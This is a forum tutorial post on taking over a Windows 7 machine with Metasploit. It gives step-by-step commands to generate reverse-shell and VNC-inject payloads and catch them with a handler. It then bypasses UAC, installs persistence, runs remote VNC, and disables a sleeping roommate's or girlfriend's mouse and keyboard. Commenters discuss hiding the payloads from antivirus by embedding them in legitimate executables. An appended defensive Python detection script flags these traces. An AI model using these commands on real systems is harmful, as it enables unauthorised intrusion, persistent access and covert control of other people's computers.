OTW's great tutorial "Hack Like a Pro: How to Save the World from Nuclear Annihilation" gave me the inspiration to try this on Win7 SP1.
I did this on Bugtraq 2 Black Widow, but it works almost the same on Kali Linux.
Step 1: Start All Services and Run Metasploit
On Bugtraq the VNC viewer is not preinstalled, so:
# sudo apt-get install vncviewer
Then start the required services:
# sudo service postgresql start
# sudo service metasploit start
# sudo msfconsole
Step 2: We Need Two Payloads
I did this with msfpayload.
First we need the meterpreter:
msf > msfpayload windows/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=<listening-port> X > /home/bugtraq/Desktop/backdoor.exe
Now we have the file backdoor.exe on our Desktop. Next we need another .exe file that we will upload to our target and execute with the meterpreter:
msf > msfpayload windows/vncinject/reverse_tcp LHOST=<your-ip> LPORT=<listening-port> X > /home/bugtraq/Desktop/gui.exe
Step 3: Let's Run the Meterpreter and Bypass the UAC
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <your-ip>
msf exploit(handler) > set LPORT <port>
msf exploit(handler) > exploit
So we see that the meterpreter is running on our target, but we need more system rights.
meterpreter > getprivs
meterpreter > getsystem
Access Denied!!
That should not be a big problem.
You can look at your privileges with the command
meterpreter > run post/windows/gather/winprivs
meterpreter > background
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set LHOST <your-ip>
msf exploit(bypassuac) > set LPORT <port>
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit
If the exploit fails the first time, just try again:
msf exploit(bypassuac) > exploit
It works, now:
meterpreter > getsystem
meterpreter > getprivs
Now we should own the system, but we also want VNC on the target.
If you want to make the meterpreter persistent in case something goes wrong, just type
meterpreter > run persistence -A -L c:\\ -X -i 5 -p <port> -r <your-ip>
Step 4: Now the Funny Part
The meterpreter has download and upload functions, and they work like this:
meterpreter > upload -r /home/bugtraq/Desktop/gui.exe C:/
Now we open a second Metasploit terminal and type in
msf > use multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set LHOST <your-ip>
msf exploit(handler) > set LPORT <port>
msf exploit(handler) > exploit
It should now look like this (screenshot not included here).
Step 5: Getting Finished...
Now we go back to our meterpreter terminal. Make sure you are in the folder C:/ where the gui.exe file is, and type in
meterpreter > execute -f gui.exe
Step 6: MUCH More FUN
Let's say a person (roommate/girlfriend/whatever) is sleeping in front of our target PC. If you want to wake him/her in an annoying way, search for his music and have some fun, hehe:
meterpreter > uictl disable mouse
meterpreter > uictl disable keyboard
and have fun :D
I am sure there are better ways to do this hack,
but it works. Suggestions for improvement are always welcome!
Hope you enjoyed it.
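The steps above leave a recognisable trail on the Windows host: an executable dropped straight into C:\ and launched from there, that executable opening an outbound connection back to the handler, and (if the persistence script is used) an autorun entry pointing at a user-writable path. The following Python script is an added example written for this page, not code from the post or from Metasploit; it runs a few simple rules over constructed Sysmon-style events (the field names, paths and SID are made up for the example, and the autorun rule assumes the persistence mechanism registers under a Run key) to show how a defender could flag that trail.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style events (not real telemetry; paths and the SID are
# made up for this example). id 1 = process create, 3 = network connection,
# 13 = registry value set.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "image": r"C:\Users\bob\Downloads\backdoor.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 3, "image": r"C:\Users\bob\Downloads\backdoor.exe",
     "dst_port": 4444, "initiated": True},
    # gui.exe was uploaded to C:\ and executed from the meterpreter session
    {"id": 1, "image": r"C:\gui.exe",
     "parent": r"C:\Users\bob\Downloads\backdoor.exe"},
    {"id": 3, "image": r"C:\gui.exe", "dst_port": 5555, "initiated": True},
    # assumed persistence trace: an autorun value pointing at a script in C:\
    {"id": 13,
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\svchost",
     "details": r"C:\svchost.vbs"},
    # benign activity that must not fire
    {"id": 1, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_port": 443, "initiated": True},
    # inbound connection to gui.exe: not an outbound beacon, ignored
    {"id": 3, "image": r"C:\gui.exe", "dst_port": 5555, "initiated": False},
]


def in_user_writable_location(path: str) -> bool:
    """True for a file sitting at a drive root, in Downloads, or in %TEMP%.

    Legitimate software is installed under Program Files or Windows; a binary
    living at C:\\ or in a download/temp directory is worth a second look.
    """
    p = path.lower()
    if re.match(r"^[a-z]:\\[^\\]+$", p):      # e.g. C:\gui.exe, straight at the root
        return True
    return "\\downloads\\" in p or "\\appdata\\local\\temp\\" in p


def detect(events: List[Dict]) -> List[Dict]:
    """Apply the rules to a list of events and return one finding per hit."""
    findings: List[Dict] = []
    for ev in events:
        if ev["id"] == 1:
            if in_user_writable_location(ev["image"]):
                findings.append({"rule": "exec-from-user-writable-path",
                                 "subject": ev["image"]})
            if in_user_writable_location(ev["parent"]):
                # a dropped binary spawning further binaries (backdoor.exe -> gui.exe)
                findings.append({"rule": "spawned-by-user-writable-parent",
                                 "subject": ev["image"]})
        elif ev["id"] == 3 and ev.get("initiated") \
                and in_user_writable_location(ev["image"]):
            # outbound connection from an oddly placed binary: reverse-shell shape
            findings.append({"rule": "outbound-from-user-writable-path",
                             "subject": ev["image"], "dst_port": ev["dst_port"]})
        elif ev["id"] == 13 and "\\currentversion\\run\\" in ev["target"].lower() \
                and in_user_writable_location(ev["details"]):
            findings.append({"rule": "autorun-to-user-writable-path",
                             "subject": ev["details"]})
    return findings


def suspicious_subjects(findings: List[Dict]) -> List[str]:
    """Distinct images/paths that triggered at least one rule, sorted."""
    return sorted({f["subject"] for f in findings})


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
    print("suspicious:", suspicious_subjects(detect(SAMPLE_EVENTS)))
```

On the sample data the Firefox events produce nothing, while each of the tutorial's traces (the dropped backdoor, gui.exe launched from C:\, both outbound connections and the autorun entry) produces a finding. The location rule is deliberately crude; in a real deployment you would tune it against your software inventory and treat the outbound rule as a correlation signal rather than an alert on its own.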
8 Comments
Cool !!!!
Thanks :)
What if there is some kind of antivirus installed on the target pc?
These are raw payloads (script-kiddie like) for testing purposes only!
If you really want to do that in a realistic way you can turn on your AV and encode and embed the payloads in legitimate exe files to avoid detection. So better use MSFVENOM instead of MSFPAYLOAD because msfpayload seems inaccurate and is getting deleted from the Metasploit database in June or something.
Our teacher OTW has some nice tutorials to avoid AV detection, but if you want I can do another tutorial in a realistic way, so with encoded payloads and turned-on AV.
Hi, I have a question. I've seen many different ways where the attacker can gain access to the victim's PC by running VNC on Kali Linux, but personally when I run VNC I can monitor the victim's screen but I couldn't control/take over control of his PC. Why is that? Is it because I didn't install something extra for it to work?
Good job. Just to note, when downloading/uploading using meterpreter, one has to use double slashes when specifying the directory, i.e. download C:\\topsecret\\secret.txt //usr//share. And one question: after executing the bypass for UAC, which session did you continue using? Session 2 or 1? Thanks
Thx for the note, in my case it also works without double slashes.
After executing the bypass for UAC, Metasploit opens a second session for that. So I continue working in session 2; session 1 can be closed.
Sorry for answering so late.
But we can simply use the run vnc command in a meterpreter session. Why do we need another .exe file to execute?